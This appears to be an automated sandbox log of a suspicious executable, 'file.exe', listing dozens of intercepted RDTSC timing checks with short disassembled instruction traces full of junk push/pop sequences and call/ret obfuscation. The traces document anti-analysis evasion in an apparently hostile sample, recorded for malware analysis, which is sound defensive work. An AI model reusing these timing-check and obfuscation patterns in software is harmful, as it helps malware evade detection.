Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 877C89 second address: 877C9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67D0802A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 878B58 second address: 878B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 877EA3 second address: 877EC8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA67D0802A3h 0x0000000b popad 0x0000000c push eax 0x0000000d jo 00007FA67D0802A4h 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 878CB5 second address: 878CBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 879D2F second address: 879D35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 878CBB second address: 878D8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A874h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b js 00007FA67C81A868h 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007FA67C81A878h 0x00000018 popad 0x00000019 nop 0x0000001a mov ebx, eax 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov dword ptr [ebp+122D2A3Bh], esi 0x00000029 stc 0x0000002a mov dword ptr fs:[00000000h], esp 0x00000031 and bx, EC82h 0x00000036 mov eax, dword ptr [ebp+122D034Dh] 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007FA67C81A868h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 00000017h 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 adc di, E1A9h 0x0000005b push FFFFFFFFh 0x0000005d push 00000000h 0x0000005f push esi 0x00000060 call 00007FA67C81A868h 0x00000065 pop esi 0x00000066 mov dword ptr [esp+04h], esi 0x0000006a add dword ptr [esp+04h], 00000018h 0x00000072 inc esi 0x00000073 push esi 0x00000074 ret 0x00000075 pop esi 0x00000076 ret 0x00000077 mov edi, dword ptr [ebp+122D2B14h] 0x0000007d jp 00007FA67C81A874h 0x00000083 nop 0x00000084 push eax 0x00000085 push edx 0x00000086 jmp 00007FA67C81A871h 0x0000008b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 878D8D second address: 878DB5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007FA67D08029Ah 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FA67D08029Eh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 879F37 second address: 879F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87AD12 second address: 87AD16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87AD16 second address: 87AD63 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA67C81A875h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FA67C81A879h 0x00000013 jmp 00007FA67C81A876h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87AEE0 second address: 87AEEB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87AEEB second address: 87AF0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA67C81A878h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87CD85 second address: 87CD9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA67D0802A5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87BFE1 second address: 87BFE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87AF0C second address: 87AF13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87CD9E second address: 87CDB1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA67C81A866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87CDB1 second address: 87CDB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87CDB5 second address: 87CDBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87CDBB second address: 87CDC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87DDDD second address: 87DDE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87DDE1 second address: 87DE51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FA67D080298h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 jmp 00007FA67D08029Bh 0x00000029 mov dword ptr [ebp+122D369Bh], esi 0x0000002f push 00000000h 0x00000031 call 00007FA67D0802A9h 0x00000036 pushad 0x00000037 mov ecx, eax 0x00000039 popad 0x0000003a pop ebx 0x0000003b push 00000000h 0x0000003d mov bx, si 0x00000040 jmp 00007FA67D08029Fh 0x00000045 xchg eax, esi 0x00000046 pushad 0x00000047 push edi 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87DE51 second address: 87DE6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jc 00007FA67C81A871h 0x0000000b jmp 00007FA67C81A86Bh 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87DE6F second address: 87DE8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67D0802A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87DE8B second address: 87DE95 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA67C81A86Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87CF56 second address: 87CF5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87CF5A second address: 87CF5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87CF5E second address: 87CF64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87CF64 second address: 87CF6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FA67C81A866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87CF6E second address: 87CF72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87DFF3 second address: 87DFF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87DFF9 second address: 87DFFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87EF58 second address: 87F00E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A878h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnl 00007FA67C81A872h 0x00000010 nop 0x00000011 push esi 0x00000012 mov bl, 7Fh 0x00000014 pop ebx 0x00000015 push dword ptr fs:[00000000h] 0x0000001c cld 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push esi 0x00000027 call 00007FA67C81A868h 0x0000002c pop esi 0x0000002d mov dword ptr [esp+04h], esi 0x00000031 add dword ptr [esp+04h], 0000001Dh 0x00000039 inc esi 0x0000003a push esi 0x0000003b ret 0x0000003c pop esi 0x0000003d ret 0x0000003e cld 0x0000003f jmp 00007FA67C81A877h 0x00000044 mov eax, dword ptr [ebp+122D0071h] 0x0000004a mov ebx, dword ptr [ebp+122D375Ch] 0x00000050 push FFFFFFFFh 0x00000052 push ebx 0x00000053 jmp 00007FA67C81A86Bh 0x00000058 pop edi 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FA67C81A878h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87F00E second address: 87F01E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA67D08029Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 825A56 second address: 825A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 825A5C second address: 825A68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 825A68 second address: 825A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 825A6C second address: 825A8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA67D0802A8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 889F66 second address: 889F6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 889F6F second address: 889F93 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FA67D0802A7h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 889F93 second address: 889F97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 882F76 second address: 882F80 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA67D08029Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 882F80 second address: 882FF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FA67C81A86Fh 0x0000000c nop 0x0000000d mov di, bx 0x00000010 push dword ptr fs:[00000000h] 0x00000017 jnc 00007FA67C81A86Ah 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push eax 0x00000027 call 00007FA67C81A868h 0x0000002c pop eax 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 add dword ptr [esp+04h], 0000001Bh 0x00000039 inc eax 0x0000003a push eax 0x0000003b ret 0x0000003c pop eax 0x0000003d ret 0x0000003e mov dword ptr [ebp+1245A0D5h], edx 0x00000044 mov eax, dword ptr [ebp+122D03E5h] 0x0000004a mov edi, eax 0x0000004c push FFFFFFFFh 0x0000004e mov ebx, 40233AA9h 0x00000053 nop 0x00000054 push eax 0x00000055 push edx 0x00000056 js 00007FA67C81A86Ch 0x0000005c jo 00007FA67C81A866h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 883E95 second address: 883E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8890A4 second address: 8890A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 88B1AD second address: 88B1B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 895EC2 second address: 895EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8955F3 second address: 8955F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8955F9 second address: 8955FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8958D4 second address: 895912 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA67D08029Eh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007FA67D0802A0h 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a jmp 00007FA67D08029Ah 0x0000001f pushad 0x00000020 popad 0x00000021 pop ecx 0x00000022 push eax 0x00000023 push edi 0x00000024 pop edi 0x00000025 pop eax 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 895912 second address: 895933 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FA67C81A878h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89B2A7 second address: 89B2CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jmp 00007FA67D0802A6h 0x0000000e mov eax, dword ptr [eax] 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89B2CD second address: 89B2F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c jmp 00007FA67C81A879h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A0052 second address: 8A0080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA67D080296h 0x0000000a pop edx 0x0000000b jmp 00007FA67D0802A4h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007FA67D08029Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89EE16 second address: 89EE20 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA67C81A866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89EE20 second address: 89EE3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67D0802A7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89EE3D second address: 89EE66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A874h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA67C81A86Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89EE66 second address: 89EE6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89EE6C second address: 89EE72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89EE72 second address: 89EE80 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FA67D08029Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89F90A second address: 89F917 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89F917 second address: 89F956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA67D0802A1h 0x00000009 popad 0x0000000a jp 00007FA67D08029Eh 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 ja 00007FA67D080296h 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FA67D08029Ch 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89F956 second address: 89F965 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pushad 0x00000007 jp 00007FA67C81A866h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89FAB5 second address: 89FAD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007FA67D08029Dh 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007FA67D080298h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89FC69 second address: 89FC6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89FC6F second address: 89FC73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A371A second address: 8A371E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A371E second address: 8A372A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FA67D080296h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A372A second address: 8A372E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A372E second address: 8A373F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jbe 00007FA67D080296h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86A01B second address: 86A021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86A3B8 second address: 6BEBBB instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA67D080298h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jg 00007FA67D080299h 0x00000013 mov dx, si 0x00000016 push dword ptr [ebp+122D01FDh] 0x0000001c xor dword ptr [ebp+122D21AFh], eax 0x00000022 call dword ptr [ebp+122D36FCh] 0x00000028 pushad 0x00000029 add dword ptr [ebp+122D2181h], esi 0x0000002f xor eax, eax 0x00000031 jmp 00007FA67D08029Fh 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a mov dword ptr [ebp+122D2181h], eax 0x00000040 mov dword ptr [ebp+122D3AC0h], eax 0x00000046 jno 00007FA67D0802A3h 0x0000004c sub dword ptr [ebp+122D255Fh], ecx 0x00000052 mov esi, 0000003Ch 0x00000057 stc 0x00000058 mov dword ptr [ebp+122D255Fh], edi 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 mov dword ptr [ebp+122D2181h], ecx 0x00000068 lodsw 0x0000006a pushad 0x0000006b sub ax, BFBAh 0x00000070 sbb edx, 54EC89E5h 0x00000076 popad 0x00000077 add eax, dword ptr [esp+24h] 0x0000007b jmp 00007FA67D08029Ah 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 jnc 00007FA67D0802AEh 0x0000008a push eax 0x0000008b pushad 0x0000008c push eax 0x0000008d push eax 0x0000008e push edx 0x0000008f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86A6D1 second address: 86A6E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A872h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86A6E7 second address: 86A6EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86ABF0 second address: 86AC39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A86Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ecx, ebx 0x0000000f mov ecx, dword ptr [ebp+122D2A5Fh] 0x00000015 push 0000001Eh 0x00000017 mov dword ptr [ebp+122D221Eh], ebx 0x0000001d push eax 0x0000001e pushad 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 jmp 00007FA67C81A879h 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a push edi 0x0000002b pop edi 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86ADBB second address: 86ADBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86B044 second address: 86B048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A3DF0 second address: 8A3DF7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A4099 second address: 8A40D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007FA67C81A86Eh 0x0000000d popad 0x0000000e pop esi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA67C81A86Bh 0x00000017 jmp 00007FA67C81A877h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A40D6 second address: 8A40E6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007FA67D080296h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8AA1FD second address: 8AA21A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FA67C81A866h 0x0000000f jmp 00007FA67C81A86Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A8FAA second address: 8A8FC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA67D0802A8h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A8FC9 second address: 8A8FDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA67C81A86Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
